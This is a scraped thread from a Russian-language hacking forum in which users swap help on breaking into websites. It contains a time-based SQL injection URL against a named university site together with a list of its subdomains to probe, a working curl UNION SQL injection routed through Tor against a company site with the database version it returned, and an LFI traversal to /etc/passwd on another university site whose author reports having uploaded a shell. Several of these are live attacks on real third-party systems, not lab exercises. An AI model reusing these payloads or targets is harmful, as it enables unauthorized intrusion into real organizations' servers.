ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.11.2016, 20:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
не надо ничего брутить, врапперы вам на что в пыхе? читайте сорцы сайта
|
|
|
|
08.11.2016, 21:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
|
|
|
|
08.11.2016, 22:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Неужели ты эту уязвимость раскрутил
http://icfi.ulim.md/alltopics.php?cat=sleep(12)
Поищи тут может найдёшь, я думаю она где-то спрятана
ftp.ulim.md
moodle.ulim.md
git.ulim.md
gw.ulim.md
domain.ulim.md
files.ulim.md
redmine.ulim.md
s.ulim.md
vm.ulim.md
|
|
|
|
10.11.2016, 17:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
|
|
|
|
10.11.2016, 17:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Код:
Code:
curl -s -k --proxy socks5://127.0.0.1:9150 -A 'mozilla' 'http://www.caresoft.ind.in/info.php' --data 'show=185+union+select+1,2,3,4,concat(999,char(58),version()),6,7+--+s' | grep 999
999:5.1.68-community
|
|
|
|
10.11.2016, 17:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от BabaDook
BabaDook said:
↑
Что же ты злой такой сегодня?
Как кошечка шипишь сегодня на всех. да и как не злиться на людей который выкладывают дамп ачата на ачате?
по врапперам кстати неплохая шпаргалка
https://www.ptsecurity.com/ru-ru/ics/А.Москвин_О_безоп_исп_РНР_wrap pers.pdf
сорцы не смотрел в итоге? там забавный мускул пользователь с такими грантами что можно поменять хэш рутового мускул пользователя
|
|
|
|
11.11.2016, 03:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
8589
Репутация:
0
|
|
Сообщение от WallHack
WallHack said:
↑
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd шелл залил в пм написал
|
|
|
|
11.11.2016, 04:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Сообщение от qqq1457
qqq1457 said:
↑
шелл залил в пм написал Спасибо, поторопился я с выводами.
|
|
|
|
11.11.2016, 14:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
подкиньте мысль, boolen-based скуль, waf фильтрует "union" ")" "/" "="
какие могут быть варианты запросов?
= можно обойти оператором "like", / в общем то не особо и нужен, за union я уже смирился, но вот чертова закрывающая скобка -_- ( именно waf, потому что в хедерах есть статус Waf-Capulta: Passed/Blocked )
даблурлэнкод пробовал
post/get waf обрабатывает, через cookie данные не уходят
потыкать можно тут ringzer0team.com ( sqlj последний таск " Internet As A Service" )
-------------------------
что удалось узнать, все эти запросы как то связаны со https://ringzer0team.slack.com ( то есть с slack.com )
правда при чем тут мускул не понятно, не одного нормального примера кода в интернетах не нашел
в запросе присутствуют поля url,title,description
некоторые параметры бд
storage_engine = InnoDB
hostname = lxc26-sql-search
version = 5.5.50-0ubuntu0.14.04.1
sql_mode = NULL
datadir = /var/lib/mysql
в корне сайт два бесполезных файла
/files/test.txt
/files/ useless.txt |
|
|
|
13.11.2016, 16:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Подскажите пож, каким запросом посмотреть базы данных которые лежат рядом?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
